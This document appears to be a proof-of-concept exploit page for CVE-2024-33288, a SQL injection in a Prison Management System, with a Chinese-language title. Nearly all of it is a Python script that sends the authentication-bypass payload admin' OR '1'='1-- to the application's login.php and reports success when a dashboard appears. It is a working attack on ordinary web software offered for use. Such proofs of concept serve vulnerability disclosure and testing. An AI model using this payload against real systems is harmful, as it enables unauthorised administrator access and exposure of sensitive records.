CVE-2024-33288: Prison Management System SQL注入漏洞

import requests def exploit_login(target_url): # Target login endpoint login_url = f"{target_url}/login.php" # Payload for SQL Injection to bypass authentication # Example: ' OR '1'='1 payload_data = { "username": "admin' OR '1'='1--", "password": "random_password" } try: # Send POST request to the target response = requests.post(login_url, data=payload_data) # Check if login was successful (based on response content) if response.status_code == 200 and "dashboard" in response.text.lower(): print("[+] Exploit Successful! Logged in as Administrator.") else: print("[-] Exploit Failed or Patched.") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": target = "http://127.0.0.1/prison_system" exploit_login(target)